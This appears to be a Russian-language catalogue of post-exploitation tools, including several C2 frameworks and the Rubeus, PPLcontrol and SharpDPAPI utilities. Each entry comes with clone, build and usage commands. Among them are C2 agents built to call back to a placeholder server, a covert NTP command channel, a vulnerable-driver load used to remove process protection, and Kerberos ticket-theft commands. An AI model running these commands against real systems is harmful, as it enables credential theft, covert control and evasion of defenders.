Post-Exploitation

50 инструментов

Mythic

v3.4.0.5
Post-Exploitation

Модульный C2-фреймворк с веб-интерфейсом, поддерживающий множество агентов (Apollo, Poseidon, Medusa и др.) через Docker-контейнеры. Поддерживает Windows, Linux, macOS. Каждый агент — отдельный плагин, легко расширяется.

# Требуется Docker и Docker Compose: git clone https://github.com/its-a-feature/Mythic cd Mythic sudo ./install_docker_ubuntu.sh sudo make # Установка агента: sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo # Запуск: sudo ./mythic-cli start # Веб-интерфейс: https://localhost:7443

NTPShell

Post-Exploitation

Скрытый C2-канал, передающий команды и данные внутри NTP-пакетов — трафик выглядит как обычная синхронизация времени и слабо детектируется сетевым мониторингом. Написан на C, сервер и клиент в одном …

git clone https://git.toolsofthetrade.qzz.io/recovered/ntpshell.git cd ntpshell gcc ntp.c -lpthread -o ntp # C2-сервер: ./ntp -S # C2-клиент (управляемая машина): ./ntp -C -s <server_addr>

Nanodump

vlatest
Post-Exploitation

Компактный инструмент для исследования дампинга учётных данных — изучает защиту LSASS и методы обнаружения доступа к памяти процесса.

git clone https://github.com/fortra/nanodump.git make -f Makefile.mingw

Nyx C2

Post-Exploitation

Модульный C2-фреймворк с кроссплатформенным агентом, сбором учётных данных и латеральным перемещением.

git clone https://github.com/omerbyrb/nyx cd nyx docker compose up -d cd server python3.11 -m venv .venv && source .venv/bin/activate pip install -r requirements.txt cd dashboard npm install && npm run dev cd agent go build -o nyx-agent . GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent.exe . GOOS=linux GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent-linux .

PPLcontrol

vlatest
Post-Exploitation

Инструмент для исследования и работы с механизмом Protected Process Light (PPL) в Windows в контексте авторизованного тестирования.

git clone https://github.com/itm4n/PPLcontrol.git # Сборка: # 1. Открыть решение (.sln) в Visual Studio # 2. Выбрать конфигурацию Release/x64 (x86 не поддерживается) # 3. Собрать решение # Установка драйвера (в виртуальной машине): sc.exe create RTCore64 type= kernel start= auto binPath= C:\PATH\TO\RTCore64.sys DisplayName= "Micro - Star MSI Afterburner" net start RTCore64 # Пример использования PPLcontrol.exe list PPLcontrol.exe get 1234 PPLcontrol.exe set 1234 PPL WinTcb PPLcontrol.exe protect 1234 PPL WinTcb PPLcontrol.exe unprotect 1234 net stop RTCore64 sc.exe delete RTCore64

Project Onyx

Post-Exploitation

Демонстрационный red-team пайплайн, показывающий продвинутый обход EDR через спуфинг телеметрии на базе AI и WASM-песочницу.

git clone --recursive https://github.com/microsoft/onnxruntime.git onnxruntime .\onnxruntime\build.bat --config Release --parallel --compile_no_warning_as_error --skip_tests --build_shared_lib --use_vcpkg --cmake_extra_defines VCPKG_TARGET_TRIPLET=x64-windows-static-md onnxruntime_BUILD_UNIT_TESTS=OFF python build.py fingerprint --show-components cargo build --manifest-path wasm_license_module/Cargo.toml --target wasm32-unknown-unknown --release python build.py build --trigger "<64-char lowercase fingerprint hash>" --secret "<exactly-32-demo-key-chars>" --model-output assets/model.onnx --wasm-input wasm_license_module/target/wasm32-unknown-unknown/release/wasm_license_module.wasm --wasm-output assets/license_module.wasm.aes python build.py verify --trigger "<64-char lowercase fingerprint hash>" --model assets/model.onnx python build.py fetch-model python build.py downlink-build --trigger "<64-char lowercase fingerprint hash>" --reference-model assets/model.onnx --output assets/downlink_update.onnx --command set_status --status lab_C2_test --expires-unix 4102444800 --cover-seed 2026 --cover-fraction 0.08 --cover-noise-scale 0.00004 python build.py downlink-verify --trigger "<64-char lowercase fingerprint hash>" --reference-model assets/model.onnx --model assets/downlink_update.onnx cmake -S . -B build -G "Visual Studio 17 2022" -A x64 cmake --build build --config Release
Post-Exploitation

ИИ-платформа для симуляции Red Team, автономно моделирующая полный жизненный цикл атаки с маппингом MITRE ATT&CK.

git clone https://github.com/apocalypse9949/Redteam-Automation.git cd Redteam-Automation pip install -e .

Rubeus

v1.6.4
Post-Exploitation

C#-инструмент для атак на Kerberos в среде Active Directory: AS-REP Roasting, Kerberoasting, Pass-the-Ticket, Overpass-the-Hash, Golden/Silver Ticket, S4U delegation, PKINIT. Часть арсенала GhostPack.

# Сборка из исходников (Visual Studio / .NET): git clone https://github.com/GhostPack/Rubeus # Открыть Rubeus.sln, собрать Release x64 # Часто загружается через C2 в память: # execute-assembly Rubeus.exe kerberoast /outfile:hashes.txt # Команды: Rubeus.exe kerberoast # Kerberoasting Rubeus.exe asreproast # AS-REP Roasting Rubeus.exe dump # дамп тикетов Rubeus.exe ptt /ticket:... # Pass-the-Ticket

ScareCrow

v5.1
Post-Exploitation

Фреймворк для исследования генерации и подписи полезной нагрузки — изучает, как средства защиты Windows реагируют на разные способы доставки и запуска. Проект архивирован автором, но остаётся справочным материалом …

go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo go get github.com/Binject/debug/pe go get github.com/awgh/rawreader go build ScareCrow.go

Seatbelt

Post-Exploitation

C#-проект для сбора информации о хосте Windows ('safety checks'), применяется как в защитных, так и в атакующих сценариях.

git clone https://github.com/GhostPack/Seatbelt.git # Visual Studio: открыть Seatbelt.sln -> Build # или командная строка: dotnet build Seatbelt.csproj -c Release # Готовый EXE доступен в GitHub Releases

SharpDPAPI

v1.12.0
Post-Exploitation

C#-порт части функциональности Mimikatz для работы с Windows DPAPI.

git clone https://github.com/GhostPack/SharpDPAPI.git # Visual Studio: открыть SharpDPAPI.sln -> Build # или командная строка: dotnet build SharpDPAPI.csproj -c Release # Готовый EXE доступен в GitHub Releases
Post-Exploitation

Приложение на C#, использующее права редактирования объекта групповой политики (GPO) для компрометации управляемых им объектов.

git clone https://github.com/ReversecLabs/SharpGPOAbuse.git # Visual Studio: открыть SharpGPOAbuse.sln -> Build (восстановить NuGet-пакеты) # или командная строка: dotnet build SharpGPOAbuse.csproj # Готовый EXE доступен в GitHub Releases